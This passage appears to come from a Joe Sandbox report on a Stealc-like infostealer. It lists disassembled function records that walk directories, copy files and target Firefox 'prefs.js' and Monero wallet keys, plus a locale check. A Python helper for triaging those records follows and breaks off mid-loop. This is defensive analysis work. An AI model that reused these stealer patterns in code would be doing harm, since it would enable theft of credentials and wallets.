                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                              • Instruction ID: 36d819330a3fe5cbfa67e1748d38e914d685f96889a106bcc56d42a74520b081
                              • Opcode Fuzzy Hash: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                              • Instruction Fuzzy Hash: D05196B6900318ABCB24FBB0DD85EEE737CBB58300F008599B659A2140DB75DB958F95
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Uk>$%ov$&wm-$&wm-$,1{$Qt5u$Qt5u$Xuy9$^s?k$a3[>$x#r$yQ~$U[~$^Ok
                              • API String ID: 0-1170347932
                              • Opcode ID: 0b2693185a87ed4f28a7cbac7f5b62e5954216e14fcc15ca963f5ad178ae5416
                              • Instruction ID: f330054ff4dcbc63f1daeafeeb6d4f22687b50d0d10e3c5baef978a498c09b63
                              • Opcode Fuzzy Hash: 0b2693185a87ed4f28a7cbac7f5b62e5954216e14fcc15ca963f5ad178ae5416
                              • Instruction Fuzzy Hash: 8AB2D6F390C604AFE304AE29DC8567AFBE9EF94720F16492DEAC4C3744E63598058697
                              APIs
                              • wsprintfA.USER32 ref: 001CED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 001CED55
                              • StrCmpCA.SHLWAPI(?,001E1538), ref: 001CEDAB
                              • StrCmpCA.SHLWAPI(?,001E153C), ref: 001CEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CF2AE
                              • FindClose.KERNEL32(000000FF), ref: 001CF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                              • Instruction ID: dc9e6e05c8c4ab6709d725fe156828a66ad3b960af8feb026d6509c95f429fcb
                              • Opcode Fuzzy Hash: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                              • Instruction Fuzzy Hash: 35E1F6719111589ADB58FB60CC92EEE733CAF74301F8041EAB40A62152EF306F8ADF56
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E15B8,001E0D96), ref: 001CF71E
                              • StrCmpCA.SHLWAPI(?,001E15BC), ref: 001CF76F
                              • StrCmpCA.SHLWAPI(?,001E15C0), ref: 001CF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001CFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                              • Instruction ID: a98f52f0f966995bf1ddefe405e60afa24da86f27c215506d3ab1f3b4b008df2
                              • Opcode Fuzzy Hash: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                              • Instruction Fuzzy Hash: D9B145719002549BCB24FF64DC95FEE7379AF64300F8085ADA80A97251EF319B4ACF96
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E510C,?,?,?,001E51B4,?,?,00000000,?,00000000), ref: 001C1923
                              • StrCmpCA.SHLWAPI(?,001E525C), ref: 001C1973
                              • StrCmpCA.SHLWAPI(?,001E5304), ref: 001C1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001C1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 001C1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C1E20
                              • FindClose.KERNEL32(000000FF), ref: 001C1E32
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                              • Instruction ID: 964470a5bacf9d5b5ac160f75110b0ab6e98accd27796b69f8b457517cde5eea
                              • Opcode Fuzzy Hash: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                              • Instruction Fuzzy Hash: 121247719501589BCB19FB60CCA6EEE7378AF74301FC0419AB50A62291EF306F89DF95
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001E0C2E), ref: 001CDE5E
                              • StrCmpCA.SHLWAPI(?,001E14C8), ref: 001CDEAE
                              • StrCmpCA.SHLWAPI(?,001E14CC), ref: 001CDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CE3E0
                              • FindClose.KERNEL32(000000FF), ref: 001CE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                              • Instruction ID: 1124ace908988f3ddda8beda2e519476f274363886babafd1453db047a3f1229
                              • Opcode Fuzzy Hash: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                              • Instruction Fuzzy Hash: 10F1A0718501689ADB19EB60DCA5EEE7378BF34301FC041EAB40A62191EF306F89DF56
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E14B0,001E0C2A), ref: 001CDAEB
                              • StrCmpCA.SHLWAPI(?,001E14B4), ref: 001CDB33
                              • StrCmpCA.SHLWAPI(?,001E14B8), ref: 001CDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CDDCC
                              • FindClose.KERNEL32(000000FF), ref: 001CDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                              • Instruction ID: a1baeaa42b66428280e1088d4dd914331f0b56d7d90f903befbd9d5f98b4583b
                              • Opcode Fuzzy Hash: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                              • Instruction Fuzzy Hash: 0B914872900104A7CB14FBB0ED56EED737DAFA4300F808569F90A96281EF35DB19CB96
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $Wy$5!kw$<Cl$?{U$c>$foSo$mC-?$ux$}4wK
                              • API String ID: 0-1598493436
                              • Opcode ID: 2dc61b851fd47ad46c8af5b9e9a76c1c9709f96f94b84cbb43540626e892bd22
                              • Instruction ID: 30b9f1da6b70c3b93eba7976391feac778840da3e7ec48d305f3d5c6e6e855bb
                              • Opcode Fuzzy Hash: 2dc61b851fd47ad46c8af5b9e9a76c1c9709f96f94b84cbb43540626e892bd22
                              • Instruction Fuzzy Hash: 35B207F3A086109FE304AE2DEC4567AB7E6EFD4620F1A853DEAC4D3744EA35580587D2
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001E05AF), ref: 001D7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001D7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 001D7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001D7C62
                              • LocalFree.KERNEL32(00000000), ref: 001D7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                              • Instruction ID: 42e78ddd978dd5741c2c707d564f3b322e6162c6bf8f37f008edf10f70f16de1
                              • Opcode Fuzzy Hash: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                              • Instruction Fuzzy Hash: 36416D71940228ABCB24DF94DC99BEEB378FF58700F6041DAE40962280DB742F85CFA5
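                               The function records above all follow the same shape: a FindFirstFileA / FindNextFileA / FindClose loop with two StrCmpCA calls right after the first hit, in one case extended with CopyFileA and DeleteFileA (the grabber that copies files out of the walked directory), and one record that enumerates keyboard layouts with GetKeyboardLayoutList and resolves each to a language name with GetLocaleInfoA (the locale gate that the "may stop execution after checking locale" signature refers to). The helper below is an added example, not Joe Sandbox or Stealc code: it parses the report's own "APIs" bullet lines and labels each function from the Win32 calls it makes directly. The three sample records are copied from this report; the labels directory-walk, file-grab and keyboard-locale-check are this example's own names; LCType 0x2 is LOCALE_SLANGUAGE per winnls.h; and the reading of the two StrCmpCA literals as the usual "." / ".." skip is an assumption the report does not confirm, so the helper only reports how far apart the two literals sit.

```python
"""Triage helper for the 'APIs' bullet lists of Joe Sandbox function records.

Added example, not code from Joe Sandbox or from the analysed sample. The
labels it emits are this example's own; the sample records are copied from
the report. Subcall lines are parsed but not used for classification.
"""
import re

# Subcall lines carry a 'Part of subcall function' prefix; wsprintfA is printed
# without an argument list, so the parenthesised part is optional.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")
LCTYPE_NAMES = {0x2: "LOCALE_SLANGUAGE"}  # winnls.h; the only LCType this sample asks for

# Constructed input: API lines of three function records from this report.
SAMPLE_RECORDS = {
    "walk": r"""
• wsprintfA.USER32 ref: 001CED3E
• FindFirstFileA.KERNEL32(?,?), ref: 001CED55
• StrCmpCA.SHLWAPI(?,001E1538), ref: 001CEDAB
• StrCmpCA.SHLWAPI(?,001E153C), ref: 001CEDC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 001CF2AE
• FindClose.KERNEL32(000000FF), ref: 001CF2C3
""",
    "grab": r"""
  • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E510C,?,?,?,001E51B4,?,?,00000000,?,00000000), ref: 001C1923
• StrCmpCA.SHLWAPI(?,001E525C), ref: 001C1973
• StrCmpCA.SHLWAPI(?,001E5304), ref: 001C1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001C1D40
• DeleteFileA.KERNEL32(00000000), ref: 001C1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 001C1E20
• FindClose.KERNEL32(000000FF), ref: 001C1E32
  • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
""",
    "locale": r"""
• GetKeyboardLayoutList.USER32(00000000,00000000,001E05AF), ref: 001D7BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 001D7BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 001D7C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001D7C62
• LocalFree.KERNEL32(00000000), ref: 001D7D22
""",
}


def parse_calls(text):
    """Turn one record's API bullets into dicts; arguments stay as printed."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append({"api": m["api"], "module": m["module"], "args": args,
                          "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def base_name(api):
    """Drop the ANSI/Unicode suffix so FindFirstFileA and FindFirstFileW match."""
    return re.sub(r"[AW]$", "", api)


def classify(calls):
    """Label the function from the calls it makes itself, not via subcalls."""
    names = {base_name(c["api"]) for c in calls if c["subcall"] is None}
    tags = []
    if {"FindFirstFile", "FindNextFile"} <= names:
        tags.append("directory-walk")
        if {"CopyFile", "DeleteFile"} <= names:
            tags.append("file-grab")  # walks a directory and copies files out of it
    if {"GetKeyboardLayoutList", "GetLocaleInfo"} <= names:
        # Enumerates installed keyboard layouts and resolves each to a language
        # name: the shape of a locale gate that decides whether to run at all.
        tags.append("keyboard-locale-check")
    return tags


def literal_spacing(calls):
    """Byte distance between the two literals StrCmpC compares inside the find loop.

    A pair a few bytes apart is consistent with the common "." / ".." skip, but
    the report does not print the strings, so this is a lead to confirm in the
    memory dump, not a finding (assumption)."""
    direct = [c for c in calls if c["subcall"] is None]
    first = next((c["ref"] for c in direct if base_name(c["api"]) == "FindFirstFile"), None)
    nxt = next((c["ref"] for c in direct if base_name(c["api"]) == "FindNextFile"), None)
    if first is None or nxt is None:
        return None
    lits = [int(c["args"][1], 16) for c in direct
            if base_name(c["api"]) == "StrCmpC" and first < c["ref"] < nxt
            and len(c["args"]) > 1 and HEX8.match(c["args"][1])]
    return abs(lits[1] - lits[0]) if len(lits) == 2 else None


def locale_query(calls):
    """Decode the GetLocaleInfo call: which LCType is requested and the buffer size."""
    for c in calls:
        a = c["args"]
        if base_name(c["api"]) == "GetLocaleInfo" and len(a) >= 4 and HEX8.match(a[1]) and HEX8.match(a[3]):
            lctype = int(a[1], 16)
            return {"lctype": lctype, "name": LCTYPE_NAMES.get(lctype, "unknown"), "buffer": int(a[3], 16)}
    return None


def embedded_strings(calls):
    """Arguments the report resolved to text rather than an address or '?'."""
    seen = []
    for c in calls:
        for a in c["args"]:
            if a != "?" and not HEX8.match(a) and a not in seen:
                seen.append(a)
    return seen


if __name__ == "__main__":
    for name, text in SAMPLE_RECORDS.items():
        calls = parse_calls(text)
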